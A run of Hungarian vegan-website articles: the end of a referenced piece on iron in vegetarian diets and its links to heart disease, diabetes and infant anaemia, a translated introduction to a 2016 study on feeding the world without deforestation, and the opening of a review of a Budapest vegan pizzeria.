citromlé, petrezselyem és kakukkfű), zöld salátával, koktélparadicsommal és teljes kiőrlésű zsemlével - Teljes kiőrlésű pita humusszal, vöröshagymával és pirospaprika szeletekkel töltve - Gyümölcslé és/vagy gyümölcs Vacsora - Pirított zöldségek (brokkoli, zöldpaprika, pak-choi (bordáskel), cukorborsó) szezámmag, napraforgómag, tökmag és kesudió, quinoa ágyon felszolgálva - Teljes kiőrlésű spagetti bolognai szójamártással (vesebab, cukkini, hagyma, paradicsom, paprika és gomba, bazsalikommal és oregánóval elkészítve) - Spenót és csicseriborsó curry, lencse dhal (fűszeres indiai egytálétel) és teljes kiőrlésű csapáti (indiai lepénykenyér) - Gyümölcslé és/vagy gyümölcs A vas és a szívbetegség A gyanú, hogy a túl sok vas növelheti a szívbetegség kockázatát, először a Lancet-ben jelent meg 1981-ben (Sullivan, 1981). Sullivan felvetette, hogy a menstruációs vérveszteség lehet a felelős a változókor előtt álló nőknél észlelt alacsonyabb szívbetegség-kockázatért az azonos korú férfiakhoz képest. Azóta más tanulmányok is megerősítették, hogy a vastöbblet növeli a CVD kockázatát (Salonen és mtsai., 1992). Ahogy a nőknél a menstruáció, az önkéntes véradás is jelentős vérveszteséget okoz, ami befolyásolhatja a raktározott vas mennyiségét. 1997-ben három különböző vizsgálat is kimutatta, hogy a rendszeres véradás csökkentette a szívbetegség és a stroke kockázatát (Tuomainen és mtsai., 1997; Meyers és mtsai., 1997; Kiechl és mtsai., 1997). A véradás során elveszített vas lehet a kockázatcsökkenés oka. Egy újabb tanulmány azt mutatta, hogy a gyakori véradás és az ezzel járó alacsonyabb vasszint javította az érrendszeri funkciókat és csökkentette az oxidatív stresszt a donoroknál (Zheng és mtsai., 2005). Az elmélet szerint a vas elősegíti a szabad gyököknek nevezett káros molekulák termelődését, amelyek oxidálhatják (károsíthatják) az artériák belső felületét, így növelve a CVD kockázatát. Ezek az eredmények még jobban alátámasztják a magas vasszint és a CVD összefüggését. |Más tanulmányok azonban arra a következtetésre jutottak, hogy nincs kapcsolat a vasstátusz és a CVD között. A British Medical Journal-nek írt levelükben finn kutatók kifogásolták ezt a következtetést, és bebizonyították, hogy minden ilyen tanulmányban megbízhatatlan módon mérték a vasstátuszt (a szérum vaskoncentrációját, illetve a transzferintelítettséget), vagy egyéb tervezési hibát követtek el (Hemilä és Paunio, 1997). Az összefüggést kételyek nélkül elfogadó néhány kutató javasolta: csökkenteni kell a raktározott vas mennyiségét, hogy csökkentsük a CVD kockázatát. Egyes kutatók szerint elegendő bizonyítékunk van ahhoz, hogy a vas mesterséges pótlása helyett inkább a véradás fontosságát hangsúlyozzuk. Mások azonban óvatosságra intenek, mert az emberiség jelentős részét érintő hiánybetegség esetében különösen stabil tudományos alapok kellenek a jelenlegi stratégia megváltoztatásához (Sempos, 2002). Nyilvánvaló, hogy több kutatásra van szükség. Az a legésszerűbb, ha kiegyensúlyozott vegetáriánus vagy vegán étrenden élünk, amely sok, magas vastartalmú növényt tartalmaz. A vas és a cukorbetegség A hemokromatózisban szenvedő betegek akár 65%-ánál is diabétesz alakulhat ki (Adams és mtsai., 1991). Mivel ezeknek a betegeknek a szöveteiben felhalmozódik a vas, ebből arra lehetett következtetni, hogy a vastúltengés cukorbetegséget okozhat. A vasbevitel és a cukorbetegség vizsgálata során kiderült, hogy míg a szervezet összes vasbevitele nincs összefüggésben a cukorbetegséggel, addig a vörös húsból származó hem vas esetében fennáll az összefüggés (Jiang és mtsai., 2004). A hem vas szabályozatlanul szívódik fel, és idővel felgyülemlik a testben. Mint már említettük, a vas katalizálhatja a szabad gyökök képződését. Ezek a káros molekulák a cukorbetegség (Oberley, 1988; Wolff, 1993) és más betegségek kialakulásában is szerepet játszanak. Új kutatások a terhes nők magas vasszintje és a terhességi cukorbetegség közötti összefüggést is jelezték. A vizsgálat szerzői arra a következtetésre jutottak, hogy a vaspótló tablettákból származó vastöbblet szerepe a terhességi cukorbetegség kialakulásában további vizsgálatokat kíván (Afkhami-Ardekani és Rashidi, 2008). Összefoglalva, a kutatás azt mutatja, hogy az inzulinrezisztencia és a diabétesz közvetlenül kapcsolódik a vastúltengéshez. A jó hír az, hogy a vegetáriánusok és a vegánok esetében ritkább az inzulinrezisztencia és a cukorbetegség, mint a húsevőknél (Kuo és mtsai., 2004). Meg kell jegyezni, hogy a vegánok étrendje nem hem vasat tartalmaz, amely szabályozottabb módon szívódik fel, mint a hem vas. Egy 30 vegetáriánust és 30 húsevőt összehasonlító tanulmány kimutatta, hogy a vegetáriánusoknak megfelelő, de alacsonyabb a vasszintjük, mint a húsevőknek. Kevesebb vegetáriánus szenved inzulinrezisztenciában (Hua és mtsai., 2001). Összefoglalva, a vegetáriánusok és a vegánok szervezete hajlamos kevesebb vasat tárolni, mint a húsevőké, mégsem gyakoribb közöttük a vashiányos vérszegénység. Ezzel szemben jól tudjuk, hogy sok húsevő vas többlettel rendelkezik, ami növeli a CVD és a rák kockázatát (Leitzmann, 2005). Baby blues Az élet első hat hónapjában a csecsemőknek csak az anyatejre (vagy speciálisan összeállított tejpótlóra) van szükségük, amely megfelelő mennyiségben tartalmaz vasat. Hat hónapos kor után a csecsemők táplálkozási szükségleteit önmagában az anyatej már nem elégíti ki. Például a 4-6 hónapos korban 4,3 mg-os napi vasigény 6 hónapos kor felett 7,8 mg-ra emelkedik. A csecsemők vérszegénységének elsődleges oka a nem megfelelő (túl korai vagy túl késői) elválasztási időpont, illetve a kiegyensúlyozatlan étrend. A helyzetet tovább rontja, hogy a tehéntej-allergia emésztőrendszeri vérzéshez vezethet, és a rektális (végbéli) vérzésnek is jól ismert okozója (Willetts és mtsai., 1999). A tejallergia okozta emésztőszervi vérzés gyakran olyan kis mennyiségű, hogy a vérveszteség nem észlelhető, de idővel vashiányos vérszegénységet okozhat. 52 csecsemő vizsgálata (akik közül 31-et szoptattak és 21-et tápszerrel tápláltak) megállapította, hogy a tehéntej bevezetése az étrendbe bélrendszeri vérveszteséggel és táplálkozási szempontból jelentős vasveszteséggel járt (Ziegler és mtsai, 1990). Frank Oski, a Johns Hopkins Orvosegyetem gyermekgyógyászati tanszékének korábbi vezetője úgy gondolja, hogy az Egyesült Államokban a tehéntej-allergia által okozott emésztőrendszeri vérzés felelős a vashiányos esetek feléért a csecsemők között (Oski, 1996). Ez megdöbbentően nagy szám, mivel a 2 éven aluliak több mint 15 százaléka szenved vashiányos vérszegénységben az Egyesült Államokban. Összefoglalás: - A vas a vörösvérsejtek hemoglobinjának létfontosságú eleme, amely segít az oxigént a test minden részébe eljuttatni. - Az Egyesült Királyságban az ajánlott vasbevitel felnőtt férfiaknak napi 8,7 mg, a nőknek 50 éves korig napi 14,8 mg. - A kiegyensúlyozott és változatos étrend a legtöbb ember számára biztosítja a szükséges mennyiségű vasat. - A túl sok vas székrekedést, hányingert, hányást és gyomorfájást okozhat, nagyon magas dózis halálos is lehet, különösen gyermekeknél. - A vas(II)-szulfát tartalmú vaspótló tabletta székrekedést és hányingert okozhat. - A táplálékban kétféle vas van: a húsból származó hem vas és a növényekből származó nem hem vas. - Az étkezéssel bevitt vas legnagyobb része (több mint 75 százalék) növényi táplálékból származik. - Jó vasforrások a hüvelyesek (borsók, babok és lencsék), a szójából készült termékek (szójatej és tofu), a sötétzöld leveles zöldségek (petrezselyem, brokkoli, pak-choy (bordáskel) és vízitorma), a dúsított gabonareggelik, a teljes kiőrlésű gabona (teljes kiőrlésű kenyér és tésztafélék), az aszalt gyümölcsök (mazsola, aszalt szilva, aszalt kajszibarack), a fekete melasz és az egyszerű fekete csokoládé. - A hem vas felszívódása független a szervezet vasszintjétől és a táplálék többi összetevőjétől. - A nem hem vas felszívódása számos tényező függvénye, beleértve a vasstátuszt és az étrend többi összetevőjét is. - Az állati eredetű és az étrend-kiegészítőkből származó vas ártalmas mennyiségben is felhalmozódhat. - A hántolatlan gabonákból, illetve a magokból és hüvelyesekből származó fitátok megkötik a vasat és akadályozzák a felszívódását. A fitáttartalom fermentálással, főzéssel és csíráztatással csökkenthető. - A teában lévő tanninok csökkenthetik a vas felszívódását. Kerülje a tea fogyasztást étkezés közben. - A tehéntej (kazein és kalcium) csökkentheti a vas felszívódását. Kerülje a tehéntej fogyasztását és a kalcium tartalmú étrend-kiegészítőket étkezés közben. - A spenótban, mángoldban, céklában jelenlévő oxálsavnak kis jelentősége van a vas felszívódásában. - A szójafehérje akadályozhatja a vasfelszívódást, bár ez a hatás csökkenthető a fitáttartalom csökkentésével. - A gyümölcsökben és zöldségekben lévő C-vitamin jelentősen javíthatja a vas felszívódását. A 200 ml narancslében lévő C-vitamin három-négyszeresére növelheti az abszorpciót. - Kis mennyiségű hús növelheti a nem hem vas felszívódását magas fitáttartalmú, alacsony C-vitamin-tartalmú étrend esetén, de a C-vitamin jobban elősegíti a vas felszívódását, mint a hús. - A vasstátusz a hemoglobin és szérumferritin mérésével állapítható meg. - A nyugati társadalmakban alacsony vasszintet és vérszegénységet általában hosszan tartó vagy súlyos vérzés (pl. menstruáció), várandósság vagy a gyermekek esetében a hirtelen növekedés okoz, és nem a rossz táplálkozás. - Túl magas vasszintet okozhat genetikai állapot, nagymértékű vérátömlesztés vagy (ritkábban) vaspótló készítmények túladagolása. - Az alacsony vasszint a leggyakoribb táplálkozási probléma világszerte. Tünetei: fáradékonyság, sápadtság, legyengült immunrendszer, csökkent figyelem-összpontosító képesség. - A veszélyeztetett csoportok közé tartoznak a hat hónaposnál idősebb csecsemők, a kisgyermekek, a serdülők és a várandós nők, valamint az idősek és azok, akik a vas felszívódását gátló élelmiszereket fogyasztanak. A nők menstruációja és a kóros vérveszteség is kockázatot jelent. - A kiegyensúlyozott vegetáriánus vagy vegán étrend ugyanannyi vagy több vasat szolgáltat, mint a húst tartalmazó vegyes étrend. - A vegetáriánusok szervezete hajlamos kevesebb vasat felhalmozni, mint a húsevőké, de a vashiányos vérszegénység nem gyakoribb a vegetáriánusok között. - A mérsékelten alacsonyabb vasszint csökkentheti a krónikus betegségek kockázatát. - A szervezetben lévő túl sok vas mérgező. A tünetek közé tartozik a hányinger, hasi fájdalom, székrekedés és ízületi fájdalom. Májkárosodást, szívelégtelenséget és cukorbetegséget is okozhat. - A túl sok vas növeli a szív- és érrendszeri betegségek, az inzulinrezisztencia és a cukorbetegség kockázatát. - A csecsemők vérszegénységét a túl korai vagy túl késői elválasztás, illetve a tehéntej-allergia következtében fellépő gyomor-bél rendszeri vérzés okozhatja. REFERENCIÁK - Adams, P.C., Kertesz, A.E. and Valberg, L.S. 1991. Clinical presentation of hemochromatosis: a changing scene. American Journal of Medicine. 90, 445-9. - Afkhami-Ardekani, M. and Rashidi, M. 2008. Iron status in women with and without gestational diabetes mellitus. Journal of Diabetes and its Complications. 2008 Jan 4. [Epub ahead of print]. - American Dietetic Association; Dieticians of Canada. 2003. Position of the American Dietetic Association and Dieticians of Canada: Vegetarian diets. Journal of the American Dietetic Association. 103 (6) 748-65. - Armah, C.N., Sharp, P., Mellon, F.A., Pariagh, S., Lund, E.K., Dainty, J.R., Teucher, B. and Fairweather-Tait, S.J. 2008. L-alpha-glycerophosphocholine contributes to meat’s enhancement of nonheme iron absorption. Journal of Nutrition. 138 (5) 873-877. - Baech, S.B., Hansen, M., Bukhave, K., Jensen, M., S?rensen, S.S., Kristensen, L., Purslow, P.P., Skibsted, L.H. and Sandström, B. 2003. Nonheme-iron absorption from a phytate-rich meal is increased by the addition of small amounts of pork meat. American Journal of Clinical Nutrition. 77 (1) 173-9. - Bishnoi, S., Khetarpaul, N. and Yadav, R.K. 1994. Effect of domestic processing and cooking methods on phytic acid and polyphenol contents of pea cultivars (Pisum sativum). Plant Foods for Human Nutrition. 45 (4) 381-388. - BMA, 1986. Diet, nutrition and health. BMA Report 4.11. - Bonsmann (genannt), S.S., Walczyk, T., Renggli, S. and Hurrell, R.F. 2008. - Oxalic acid does not influence nonhaem iron absorption in humans: a comparison of kale and spinach meals. European Journal of Clinical Nutrition. 62 (3) 336-341. - Brune, M., Rossander, L. and Hallberg, L. 1989. Iron absorption and phenolic compounds: importance of different phenolic structures. European Journal of Clinical Nutrition. 43 (8) 547-57. - Bull, N.I., Buss, D.H. 1980. Haem and Non-haem Iron in British Diets. Journal of Human Nutrition. 34, 141-145. - Burke, W., Cogswell, M.E., McDonnell, S.M. and Franks, A. 2000. Public Health Strategies to Prevent the Complications of Hemochromatosis. In: Khoury, M.J., Burke and Thomson, E.J. eds. Genetics and Public Health in the 21st Century: using genetic information to improve health and prevent disease. London: Oxford University Press. - Cook, J.D., Skikne, B.S. and Baynes, R.D. 1994. Iron deficiency. The global perspective. Advances in Experimental Medicine and Biology. l356, 219 -228. - Craig, W. J. 1994. Iron Status of Vegetarians. American Journal of Clinical Nutrition. 59, Supp, p 1233S-7S. - Davey, et al., 2003. EPIC-Oxford: lifestyle characteristics and nutrient intakes in a cohort of 33 883 meat-eaters and 31 546 non meat-eaters in the UK. Public Health Nutrition. 6 (3) 259-69. - Department of Health (1991) Dietary Reference Values for Food Energy and Nutrients for the United Kingdom. London: HMSO. - Fairweather-Tait S.J. 2004. Iron nutrition in the UK: getting the balance right. Proceedings of the Nutrition Society. 63 (4) 519-28. - FSA, 2002. McCance and Widdowsons The Composition of Foods, 6th summary edition. Cambridge, England, Royal Society of Chemistry. - FSA, 2003. Food Standards Agency: Expert Group on Vitamins and Minerals. Safe Upper Levels for Vitamins and Minerals. London: Food Standards Agency. - FSA, 2003a. Henderson, L., Irving, K., Gregory, J., Bates, C.J., Prentice, A., Perks, J., Swan, G. and Farron, M. National Diet and Nutrition Survey: adults aged 19 to 64 years: Vitamin and mineral intake and urinary analytes. London: TSO. Volume 3. - Geissler, C. and Powers, H. eds. 2005. Human Nutrition. 11th ed. [CD-ROM] London: Elsevier Churchill Livingstone. Figure 12.3. - Grantham-McGregor, S. and Ani, C. 2001. A review of studies on the effect of iron deficiency on cognitive development in children. Journal of Nutrition. 131 (2S-2) 649S-666S; discussion 666S-668S. - Hallberg, L., Brune, M., Erlandsson, M., Sandberg, A-S. and Rossander-Hulthen, 1991. Calcium: effect of different amounts on non-heme and heme-iron absorption in humans. American Journal of Clinical Nutrition. 53, 112-119 - Harvey, L.J., Armah, C.N., Dainty, J.R., Foxall, R.J,, John Lewis, D., Langford, N.J., Fairweather-Tait, S.J., Hemalatha, S., Platel, K. and Srinivasan, K. 2005. - Impact of menstrual blood loss and diet on iron deficiency among women in the British Journal of Nutrition. 94 (4) 557-564. - Hemalatha, S., Platel, K. and Srinivasan, K. 2007. Influence of germination and fermentation on bioaccessibility of zinc and iron from food grains. European Journal of Clinical Nutrition. 61 (3) 342-8. - Hemilä, H. and Paunio, M. 2007. Blood donation, body iron stores, and risk of myocardial infarction. Confidence intervals and possible selection bias call study results into question. British Medical Journal. 314 (7097) 1830-1831. - Hua, N.W., Stoohs, R.A. and Facchini, F.S. 2001. Low iron status and enhanced insulin sensitivity in lacto-ovo vegetarians. British Journal of Nutrition. 86 (4) 515-519. - Hunt, J.R., Mullen, L.M., Lykken, G.I., Gallagher, S.K. and Nielsen, F.H. 1990. - Ascorbic acid: effect on ongoing iron absorption and status in iron-depleted young women. American Journal of Clinical Nutrition. 51 (4) 649-655. - Hunt, J.R. 2003. Bioavailability of iron, zinc, and other trace minerals from vegetarian diets. American Journal of Clinical Nutrition. 78 (3) 633S-639S. - Hurrell, R.F., Lynch, S.R., Trinidad, T.P., Dassenko, S.A. and Cook, J.D. 1989. - Iron absorption in humans as influenced by bovine milk proteins. American Journal of Clinical Nutrition. 49, 546-552. - Hurrell, R.F., Reddy, M.B., Juillerat, M.A. and Cook, J.D. 2003. Degradation of phytic acid in cereal porridges improves iron absorption by human subjects. American Journal of Clinical Nutrition. 77 (5) 1213-1219. - Jiang, R., Ma, J., Ascherio, A., Stampfer, M.J., Willett, W.C. and Hu, F.B. 2004. - Dietary iron intake and blood donations in relation to risk of type 2 diabetes in men: a prospective cohort study. American Journal of Clinical Nutrition. 79 (1) 70-75. - Kiechl, S., Willeit, J., Egger, G., Poewe, W. And Oberhollenzer, F. 1997. Body iron stores and the risk of carotid atherosclerosis: prospective results from the Bruneck study. Circulation. 96, 3300-3307. - Kuo, C.S., Lai, N.S., Ho, L.T. and Lin, C.L. 2004. Insulin sensitivity in Chinese ovo-lactovegetarians compared with omnivores. European Journal of Clinical Nutrition. 258 (2) 312-316. - Leitzmann C., 2005. Vegetarian diets: what are the advantages? Forum on Nutrition. (57) 147-156). - Marero, L.M., Payumo, E.M., Aguinaldo, A.R., Matsumoto, I. and Homma, S. 1991. The antinutritional factors in weaning foods prepared from germinated legumes and cereals. Lebensmittelwissenschaft Technol. 24, 177-81. - Meyers, D.G., Strickland, D., Maloley, P.A., Seburg, J.K., Wilson, J.E. and McManus, B.F. 1997. Possible association of a reduction in cardiovascular events with blood donation. Heart. 78, 188-193. - Monsen, E.R. 1988. Iron nutrition and absorption: dietary factors which impact iron bioavailability. Journal of the American Dietetic Association. 88 (7) 786-90. - Nävert, B., Sandström, B. and Cederblad, A. 1985. Reduction of the phytate content of bran by leavening in bread and its effect on zinc absorption in man. British Journal of Nutrition. 53 (1) 47-53. - Nelson, M. and Poulter, J. 2004. Impact of tea drinking on iron status in the UK: a review. Journal of Human Nutrition and Dietetics. 17 (1) 43-54. - NHS Direct, 2008. Haemochromatosis [online]. Available from: www.nhsdirect.nhs.uk/articles/article.aspx?articleId=2521§ionId=1 [Accessed May 1 2008]. - Oberley, L.W. 1988. Free radicals and diabetes. Free Radicals Biology and Medicine. 5, 113-124. - Oski, F.A. 1996. Dont Drink Your Milk. New York: TEACH Services Inc. Salonen, J.T., Nyyssönen, K., Korpela, H., Tuomilehto, J., Seppänen, R. and Salonen, R. 1992. High stored iron levels are associated with excess risk of myocardial infarction in eastern Finnish men. Circulation. 86 (3) 803-811. - Sempos C.T. 2002. Do body iron stores increase the risk of developing coronary heart disease? American Journal of Clinical Nutrition. 76, 3, 501-503. - Sharma, D.C. and Mathur, R. 1995. Correction of anemia and iron deficiency in vegetarians by administration of ascorbic acid. Indian Journal of Physiology and Pharmacology. 39 (4) 403-406. - Sharp, P. 2005. Minerals and trace elements. In: Geissler, C. and Powers, H. eds. Human Nutrition. 11th edition. London: Elsevier Limited, 240. - Sullivan, J.L. 1981. Iron and the sex difference in heart disease risk. Lancet. 1(8233) 1293-1294. - Temme, E.H. and Van Hoydonck. P.G. 2002. Tea consumption and iron. European Journal of Clinical Nutrition. 56 (5) 379-86. - Tuomainen, T-P., Salonen, R., Nyyssonen, K. and Salonen, J.T. 1997. Cohort study of relation between donating blood and risk of myocardial infarction in 2682 men in eastern Finland. British Medical Journal. 314, 793-794. - Viadel, B., Barberá, R. and Farré, R. 2006. Calcium, iron and zinc uptakes by Caco-2 cells from white beans and effect of cooking. International Journal of Food Science and Nutrition. 57 (3-4) 190-197. - Willetts, I.E., Dalzell, M., Puntis, J.W. and Stringer, M.D. 1999. Cows milk enteropathy: surgical pitfalls. Journal of Pediatric Surgery. 34 (10) 1486-8. - Wolff, S.P. 1993. Diabetes mellitus and free radicals. Free radicals, transition metals and oxidative stress in the aetiology of diabetes mellitus and complications. British Medical Bulletin. 49, 642-652. - Yang, R-Y., Tsou, S. T. S., and Lee, T-C. 2002. Effect of cooking on in vitro iron bioavailability of various vegetables. In: Lee T-C. and Ho C-T. eds. Bioactive compounds in foods, effects of processing and storage. ACS Symposium Book Series 816. American Chemical Society. 130-142. - Zheng, H., Cable, R., Spencer, B., Votto, N., Katz, S. D. (2005). Iron Stores and Vascular Function in Voluntary Blood Donors. Arteriosclerosis, Thrombosis, and Vascular Biology. 25: 1577-1583. - Ziegler, E.E., Fomon, S.J., Nelson, S.E., Rebouche, C.J., Edwards, B.B., Rogers, R.R. and Lehman, L.J. 1990. Cow milk feeding in infancy: further observations on blood loss from the gastrointestinal tract. The Journal of Pediatrics. 116 (1) 11-8.
Biofizikai lehetőségeink a világ élelmezésére további erdőirtások nélkül
2016 áprilisában publikáltak egy tanulmányt, amely 67 forrásra támaszkodva vezeti le, hogy fenntarthatóság szempontjából melyik étrend az, amelyik a bolygónk maradék erdeinek védelmében a legmegfelelőbb. Az eredeti tanulmány szerzői és angol címe: Karl-Heinz Erb, Christian Lauk, Thomas Kastner, Andreas Mayer, Michaela C. Theurl & Helmut Haberl: Exploring the biophysical option space for feeding the world without deforestation. Nat. Commun. 7:11382 doi: 10.1038/ncomms11382 (2016). LINK az eredeti tanulmányhoz. Fordította: Kertész Tibor A fordítás szakmai lektora: Farkas Richárd (PTE Közgazdaságtudományi kar) A fordítás stilisztikai helyreigazítását végezte: Garai Attila (Biológus, az Orvosi továbbképző szemle szerkesztője) Köszönjük mindannyiótoknak az áldozatos munkát! Kivonat A világ megmaradt erdőinek védelme kiemelt cél. Tanulmányunkban felmérjük a biofizikai lehetőségeket arra vonatkozólag, hogyan élelmezzük az emberiséget 2050-ben további erdők kiirtása nélkül. Szisztematikusan ötvözzük a jövőbeni terméshozamokra, a mezőgazdasági területekre, az állatállomány takarmányozására és az emberi étrendre vonatkozó reális feltételezéseket. Minden egyes forgatókönyv esetében meghatározzuk, hogy a növényi termékek kínálata fedezi-e a keresletet, és hogy a legeltetési intenzitás elfogadható határokon belül marad-e. Megállapítottuk: számos lehetőség létezik arra, hogy 2050-ben erdőirtás nélkül elérhető legyen a megfelelő globális élelmiszer-ellátás, még alacsony terméshozamok mellett is. Az egyes forgatókönyvek nagymértékben különböznek a biomassza-termelés, a termőterület iránti igény és a legeltetési intenzitás tekintetében, elsősorban az emberi étrend mennyiségi és minőségi szempontjaitól függően. A legeltetési korlátok erősen behatárolják az lehetőségeket. Ha nem számolunk emberi beavatkozással a természetes vagy félig természetes állapotú területeken, akkor a kereskedelem volumene növekedni fog azokban a forgatókönyvekben, ahol a táplálkozási módok globálisan egymáshoz konvergálnak, ezáltal csökken számos régió esélye arra, hogy élelmiszerekből önellátó legyen. Előszó A földterületek felhasználása számos, egymással összefüggő kihívással néz szembe a jövőben. A szárazföldi ökoszisztémák kulcsszerepet játszanak a globális éghajlati rendszerben, a globális biológiai sokféleség jelentős részét tartják el, és olyan ökoszisztéma-szolgáltatásokat nyújtanak, amelyek nélkülözhetetlenek az emberiség számára. E szolgáltatásokon az élelmiszereket, a rostanyagokat, az energiát, a víz- és levegőtisztítást, a mikroklíma szabályozását és a természetes veszélyektől való védelmet1 értjük. A Föld szárazföldi, jégmentes felületének háromnegyedét jelenleg az emberiség használja,2,3 és a globális potenciális nettó elsődleges termelés (NPPpot, az ember távollétében is aktív elsődleges termelők, pl. a növények éves nettó szervesanyag-termelése) egynegyedét is az emberiség sajátítja ki.4,5 A földhasználat sok más környezeti hatással is együtt jár, például eutrofizációval, környezetszennyezéssel, a biológiai sokféleség csökkenésével vagy klimatikus hatásokkal. Ezek a negatívumok olyan szinteket érhetnek el, amelyek veszélyeztetik az emberiség által élvezett ökoszisztéma-szolgáltatásokat.6,7. Általában sürgető fenntarthatósági kihívásnak tekintik8 azon módszerek feltárását, amelyek lehetővé teszik a növekvő globális népesség élelmezését és ellátását, miközben megőrzik az ökoszisztémák életet fenntartó funkcióit.1,8 A fennmaradó erdős ökoszisztémák védelme ebben az összefüggésben központi kívánalom. Az erdők több szén-dioxidot tárolnak, mint bármely más felszínborítás típus,9 és a globális biológiai sokféleség jelentős részének adnak otthont.10 Földünk őserdőinek jelentős részét az emberiség már mezőgazdasági területté alakította,2 és ez a folyamat most is zajlik, különösen a trópusi régiókban.11,12 Az olyan nemzetközi tevékenységek, mint az ENSZ együttműködési programja, az erdőirtásból és az erdők leromlásából származó emissziók csökkentésére a fejlődő országokban (Reducing Emissions from Deforestation and Forest Degradation in Developing Countries, REDD) a még meglévő erdei ökoszisztémák védelmét célozzák az éghajlatváltozás mérséklése céljából. Fölvetették, hogy az erdők globális kiterjedése az emberiség számára biztonságos mozgástér indikátora is lehet, és a fenntarthatóság szempontjából kiemelt jelentőségűnek tartják.13 A meglévő erdők megóvása azonban hátráltatja a mezőgazdasági fejlődést, mivel korlátozza a termőföldek és legelőterületek kiterjesztését. Következésképpen a világ egyre növekvő népességének14,15,16 egyre növekvő élelmiszer-, takarmány-, rostanyag- és üzemanyag igényét az egy főre jutó termőterületek csökkenése mellett kell kielégíteni. A legfrissebb tanulmányok azt mutatják, hogy a termőterület bővítése nélkül is lehetséges megfelelő élelmezést biztosítani,17 például a jelenleginél nagyobb terméshozamokkal, 18 ami magasabb mezőgazdasági ráfordításon és nagy volumenű kereskedelmen alapulna.19 Ezzel szemben más tanulmányok azzal érvelnek, hogy az alacsony ráfordítású gazdálkodási rendszerek, mint például az organikus (ökológiai) gazdálkodás, létfontosságúak a jelentős ökoszisztéma-szolgáltatások megóvásában.20,21,22 Hogy az alacsony ráfordítású vagy organikus gazdálkodási rendszerek képesek-e és milyen feltételek mellett képesek élelemmel ellátni a világot, élénken vitatott kérdés,23,24 és további vizsgálatokat igényel.25 A klímaváltozás földhasználat alapú csökkentésének stratégiáit értékelő tanulmányok az emberi étrendek26,27 jövőbeli fejlődését és a globális állatállomány-rendszerek hatékonyságának növelését28,29,30,31 tekintették kulcsfontosságúnak. Azonban az állattenyésztési rendszerek hatékonyságának növekedése nagy takarmányigénnyel jár, ami a termőterületekről származó koncentrált takarmány használatával súlyosbíthatja az élelmezéshez kapcsolódó földhasználati versenyt.8,28,32 Ezzel szemben az élelmiszer-termesztésre közvetlenül nem használható területek és a kérődző állatok fontos lehetőséget kínálnak az élelmezésbiztonság és a megélhetés biztosítására bizonyos körülmények között.33,34,35 A nézőpontok ezen sokszínűsége indokolja az olyan tényezők kölcsönhatásainak szisztematikus feltárását, mint a táplálkozás, a terméshozamok és az állattenyésztés hatékonysága a mezőgazdasági fejlesztésben. Különösen a legeltetés korlátai válnak meghatározóvá hipotetikus, erdőirtás nélküli világunkban. Ebben a helyzetben a termőterületeket kiterjeszthetik a fel nem használt, erdővel nem borított földterületekre - amelyek jellemzően alacsony termőképességűek az éghajlati korlátozó tényezők és az általuk képviselt nagy természeti értékek miatt (átalakításuk is magas ökológiai költséggel jár) -, vagy még inkább más területekre, amelyeket eddig nem műveltek meg, illetve nem részei az infrastruktúrának. Az ilyen területek többsége legelőként használható, változó intenzitással.2,36,37 Ebben a tanulmányban szisztematikusan feltárjuk a mezőgazdasági termelés hipotetikus, erdőirtásmentes határfeltételéből adódó opciókat és korlátokat, és világosan meghatározzuk a legeltetés korlátait. Feltárjuk a kínálatoldali intézkedések (köztük a terméshozamok növelése és a termőterület-bővítés) egyedi szerepét, az állattenyésztési rendszer hatékonyságát érintő intézkedéseket (a takarmányhasznosítási arányok javítását) és a keresletoldali intézkedéseket (mint a mennyiségi és minőségi változások az emberi táplálkozásban). Ezen paraméterek mindegyikére összegyűjtöttük a 2050-re vonatkozó előrejelzéseket, és az adatokat beépítettük egy egységes biomassza-egyensúlyi modellbe (BioBaM), 38,39 hogy megvizsgálhassuk azok kombinált hatásait. Minden egyes forgatókönyv öt paraméter egyedi kombinációjából áll (1. ábra), számszerűsíti a biomassza keresletének és kínálatának viszonyát - a világ, illetve 11 különböző régió számára -, az átlagos legeltetési intenzitással és regionális biofizikai kereskedelmi mérlegekkel együtt. 1 ábra: Kulcs paraméterek és változataik kombinációja a BioBaM-ban, illetve a 2000-es év adatai. (a) A termőföld kibővítési változatok (millió km2), a bővítés nélkülitől (+0%) a nagy hozamú legelők maximális kihasználásáig (+70%). A +11%-os változat összhangban áll a FAO előrejelzéseivel14. (b) a régiós- és fajspecifikus terméshozamok dobozai minden varációra (t sza/ ha/ év - tonna szárazanyag/ hektár/ naptári év), a változatos ökológiai termeléstől a nagy hozamú intenzív monokultúrákig terjedő variációkat mutatják. A színes dobozok jelölik a két belső kvartilitást (>25 és 25 és
Nápolyi pizza vegánul, ez a vegażżi
Decemberben megnyílt Magyarország első vegán pizzázója, a vegażżi. Nápolyi stílusú pizzájukat fatüzelésű kemencében sütik, így garantálva a tradicionális olasz élményt. Egyelőre aránylag kevés helyen lehet vegán pizzát kapni Budapesten, a fatüzelésű kemence is ritkaság számba megy, viszont fatüzelésű kemencében sült vegán pizzát legközelebb csak a szigetországban kóstolhatsz. A vegażżi arcok elmondása szerint eredeti nápolyi receptúra szerint alkotják a tésztát, amelyet minimum 48 órás kelesztéssel készítenek. Emellett a kézzel nyújtott tészta, 60-90 másodperc alatt sül meg a közel 500 °C-ra felhevített fatüzelésű kemencében, amitől egy nagyon könnyed, ropogós tésztát kapunk. Úgy gondolják, hogy hátrányukat sikerült előnnyé kovácsolni, ugyanis azzal, hogy növényi alapú azaz vegán pizzát készítenek, nem tudják hozni a sokak számára kedvenc, megszokott sonkás, sajtos vagy akár tejfölös vonalat. Ugyanakkor pontosan ebből kiindulva kényszerülnek olyan pizzaspecialitásokat alkotni, amelyek sehol máshol nem kaphatóak. Ilyen például a parajpesztós Verde, vagy a szelídgesztenyés, zsályás, sütőtökkrémes Autunno, de a januári Pizza Funghi gombás pizzájuk is élményszámba megy, hisz nem elégedtek meg annyival, hogy gombát tettek a pizzára, hanem egyedülálló módon gombapesztóval tették különlegessé az ízélményt. vegażżi étlap és a havi specialitások Összességében 7 pizzát kóstolhatunk a vegażżi-nál: a két tradicionális (Marinara, Margherita), a két populáris (Bolognese, Ungherese) és a két ínyencség (Verde, Autunno) mellett minden hónapban más és más pizza különlegességgel kényeztetnek el minket. Januárban a már említett Pizza Funghi a kiemelt ajánlat, amelyet már csak ezen a héten tudtok kóstolni náluk, februárban valami egészen mással lepnek meg minket. A pizzák mindegyike olasz lisztből és olasz pardicsomszósszal készülnek, azonban a pesztókat és a riszmozzarella-t saját maguk készítik. Nincs a kemencében jól működő és finom növényi sajt a piacon, emellett mivel szinte mindegyik zsíros és 